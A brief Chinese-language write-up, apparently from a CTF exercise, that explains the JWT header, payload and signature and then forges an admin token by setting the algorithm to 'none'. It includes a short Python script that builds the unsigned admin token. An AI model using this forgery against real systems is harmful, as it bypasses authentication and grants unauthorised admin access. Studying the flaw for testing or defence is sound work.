Json Web Token,是一种令牌格式,形式由三部分组成,之间由.连接,(解密网站为:JSON Web Tokens – jwt.io)形式大概就是如下:
三部分分别为1.header:声明了JWT的签名算法 2.payload:承载了各种声明并传递明文数据,例如:username、password等 3.signture:拥有该部分的JWT被称为JWS,也就是签了名的JWS
我们把alg改为none,因为当alg为none的时候,后端将不执行签名验证,也就相当于没有加密方式了,再把username改为admin,secretid改为[],利用脚本生成,脚本:
import jwt
token = jwt.encode(
{
“secretid”: [],
“username”: “admin”,
“password”: “123456”,
“iat”: 1657953245
},
algorithm=”none”,key=””).encode(encoding=’utf-8′)
print(token)
打call~